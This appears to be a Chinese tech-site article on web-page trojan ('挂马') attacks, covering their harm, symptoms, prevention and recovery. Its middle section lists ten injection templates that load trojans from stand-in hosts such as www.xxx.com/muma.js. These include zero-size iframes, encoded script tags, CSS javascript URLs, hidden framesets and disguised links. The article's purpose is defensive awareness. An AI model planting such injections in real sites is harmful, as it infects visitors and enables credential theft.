【IT168 专稿】如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的。如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中。
网马危害
如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很多杀毒软件没有及时更新的用户在不知不觉中深受其害。对于服务器而言,其一方面是带宽与系统资源的占用巨大,另一方面直接导致该服务器成为木马传播之源,成为傀儡帮凶,严重影响到网站的信誉。而对于受害网民来说,个人资料信息的安全将成为公众目标,其电子银行帐户和密码、游戏帐号和密码、邮箱帐户和密码、QQ/MSN 帐号和密码等都不再安全。
常见挂马手段
目前,利用网页木马进行攻击已经成为流行的恶意用户攻击手段,应引起广大网民与网站的足够重视!下面列出网页挂马的几中常见类型:
一、body挂马:<body ></body>
二、框架挂马:<iframe src=地址 width=0 height=0></iframe>
三、js变形加密: <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>muma.txt可改成任意后缀。
四、css中挂马:body {background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
五、隐蔽挂马:top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'
六、js文件挂马: 首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js, 则JS挂马代码为<script language=javascript src=xxx.js></script>
七、图片伪装:
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
八、javascript挂马:
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
九、伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十、高级欺骗:
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,
resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
以上几中虽然列出了常见的网页木马驻扎方式,但随着时间的推移,这些挂马方式将会演变成各种各样的形态,旨在盗取不同的机密与链接恶意用户指定的木马载有页,以达下载更多的木马病毒霍乱被感染的计算机,让其成为新的病毒木马载体源,从而为新一轮的感染创造条件。
中马后的症状
其实最简单的方也可以用netstat-a命令查看。你可以通过这个命令发现所有网络连接,这时如果有攻击者通过木马连接,就可以通过这些信息发现异常。总得来说:关注以下几点,将会使网民的网络生活更加安全。
第一、计算机莫名其妙自动打开某网站时,那铁定是该电脑中招了。
第二、访问完某站点后,电脑突然弹出一个警告框或者是询问框弹出来,一闪而过。
第三、系统配置自动被更改。比如系统日期时间的更改,将直接导致计算机中的杀毒软件过期。
第四、硬盘老没缘由地读盘,指示灯狂闪。
用户木马防范
要想防止木马病毒,必先对计算机安全作出加固,只有在作出防范的基础之上才能应对网马。
第一点:打入系统丁。由于各类漏洞会不断地被发现,而一些严重性较高的漏洞在发现后不久就会有相应的病毒出现。所以即时安装补丁可以降低病毒入侵的可能性。可以通过Windows Update获取最新的补丁包,对于浏览器来说,可禁用部分控件和脚本等安全性设置。
第二点:升级杀软与防火墙。当系统补丁更新完成后,那面对病毒木马来范时,只有杀毒软件与防火墙才能在第一时间得知信息通知用户,而其病毒库的更新就显得尤其重要。较新的病毒库可以识别出一定数量的木马,并阻断其恶意代码在本地运行,可大大降低木马感染的可能性。
第三点:网站浏览注意事项。网民在网络活动时,不要轻易接收从即时通讯中传递来的文件、音乐、影视,甚至网址。在面对邮箱里的附件时,应先查毒再下载。(这里建议用户选择智能杀毒较好的邮箱作为常用附件箱),不要随便浏览信用度不高的网站,如果遇到网络下载,那应尽量在较大的站点上下载,避免所下载的软件经过恶意捆绑。
感染后的应急措施
如果计算机被感染了木马,建议普通用户重装计算机或利用GHOST还原系统,并注意系统日期是否为当前日期,系统正常后立即安装系统补丁并升级杀毒软件病毒库,对全盘进行病毒扫描,随后在运行项里输入msconfig查看随机启动项是否有不明程序。为了防止用户资料泄密,应当修改所有的用户名和密码,以防不测。
而对于有一定基础的用户来说,则可将其病毒名输入到各搜索引擎中,查看了解此病毒木马的类型,通过以知的清除方法,对其进行清理即可。高手则可以通过病毒木马入驻行为通过虚拟的平台对其进行原理分析,从中得出清理方案,公布与众造福网友。
编者按:作为一台服务器管理人员,在平时的日常工作中要做到经常性的检查服务器日志、网站代码或借助于专业的检测工具来发现网页木马疑点。而作为一个网民来说,只要在日常网络中多加注意使用习惯,并开启防病毒软件与防火墙,细心留意计算机的响应变化即可。